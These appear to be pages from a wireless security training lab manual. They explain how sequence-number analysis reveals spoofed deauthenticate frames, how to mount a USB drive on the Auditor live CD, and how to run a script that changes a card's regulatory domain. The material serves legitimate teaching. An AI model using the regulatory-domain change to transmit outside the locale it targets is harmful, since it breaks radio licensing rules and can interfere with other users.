Question: Is there a way we can determine if the deauthenticate frame was transmitted by an access point or by an attacker?
Answer: Examine the sequence number used by the attacker. The sequence number is controlled by firmware for the Prism2 cards supplied in the SWAT kit, and will likely be significantly smaller or larger than the sequence numbers used by the access point. Even though the access point frames and the deauthenticate frames have the same source MAC address and BSSID, a WLAN IDS system can use sequence number analysis to identify anomalies in the pattern and flag the traffic as originating from a spoofed source.

Lab Appendix A

This appendix provides a simple set of instructions to use a USB thumb drive for persistent storage when using the Auditor Security Toolkit Linux distribution.

Purpose: Configure Auditor to save files to persistent storage.

Description: Because the Auditor Security Toolkit Linux distribution is CD-ROM based, when the system is powered off, all files that were created are lost. Follow these instructions to save files to a USB thumb drive.

1.1.1. Open an XTerm Window

Open a terminal window by clicking on the XTerm icon on the taskbar (the small black box to the left of the square with the number 1 in it).

1.1.2. Make a Mount Point

Create a directory in the /mnt directory that will be used as a mount point for the USB drive, as shown below.

root@0[root]# mkdir /mnt/thumb
root@0[root]#

1.1.3. Insert the USB Thumb Drive

Insert the thumb drive into an available USB port.

1.1.4. Identify the USB Device

Identify the USB device name used for the thumb drive on your system. For most users, this will be the "/dev/sda1" device. We can get a list of available hard drive partitions and devices by running the "fdisk -l" command, as shown below.
root@1[root]# fdisk -l

Disk /dev/sda: 65 MB, 65208320 bytes
128 heads, 11 sectors/track, 89 cylinders
Units = cylinders of 1419 * 512 = 726528 bytes

   Device Boot    Start       End    Blocks   Id  System
/dev/sda1   *         1        90     63674    6  FAT16
Partition 1 has different physical/logical endings:
     phys=(88, 128, 11) logical=(89, 97, 1)
root@1[root]#

We can see from this output that the USB device is /dev/sda1. This will be the appropriate device name for almost all users.

1.1.5. Mount the USB Drive

Mount the USB drive as shown below.

root@1[root]# mount -t vfat /dev/sda1 /mnt/thumb
root@1[root]#

1.1.6. Save Files to the USB Drive

When you want to save a file to the USB drive, simply copy it to the /mnt/thumb directory with the "cp" command, as shown below.

root@1[lab5]# cp lab5capture.cap /mnt/thumb
root@1[lab5]#

1.1.7. Unmount the USB Drive

Before removing the USB drive, you must unmount it. This will ensure there are no outstanding write operations pending and prevent you from losing data.

root@1[root]# umount /mnt/thumb
root@1[root]#

1.1.8. Remove the USB Drive

The USB drive is now safe to remove, with your data safely stored.

SWAT Kit - International Firmware Selection

The wireless cards distributed with the SWAT kit are restricted to transmit and monitor on the channels approved by the US Federal Communications Commission. Follow the instructions in this document to change the regulatory domain on the SWAT kit wireless card for your locale. To complete these steps, you will need the wireless card that was distributed with your SWAT kit as well as the bootable Linux CD-ROM used for lab exercises.

Step 1. Boot the Linux CD-ROM

Insert the course CD into your CD drive and restart your system, instructing the BIOS to boot from the CD. Once you have booted the Linux CD, open an xterm shell by clicking on the xterm button on the taskbar.

Step 2.
Insert SWAT kit wireless card

Insert the SWAT kit wireless card into the PC Card or PCMCIA slot on your system.

Step 3. Execute the chregdom script

Execute the script designed to change the local regulatory domain by entering the following commands into your xterm window:

root@1[root]# cd /tmp/intl
root@1[intl]# ./chregdom.sh

Step 4. Answer prompts

The chregdom script will ask you to supply your wireless card interface name and the desired regulatory domain. Please supply this information as instructed.

NOTE: Most systems will recognize the SWAT kit wireless card as the "wlan0" interface. Some systems with built-in wireless cards (excluding Intel Centrino wireless cards) may have a naming conflict with the built-in wireless card. In these cases, your system may recognize your SWAT kit wireless card as "wlan1". You can determine what interface name is in use by running the "ifconfig -a" and "dmesg" commands on the system. Please seek the assistance of a proctor or the instructor if you need assistance.

After supplying the necessary information, the chregdom script will ask you to wait while it updates the wireless card. DO NOT interrupt this process; otherwise it is possible you could irrevocably damage your wireless card.
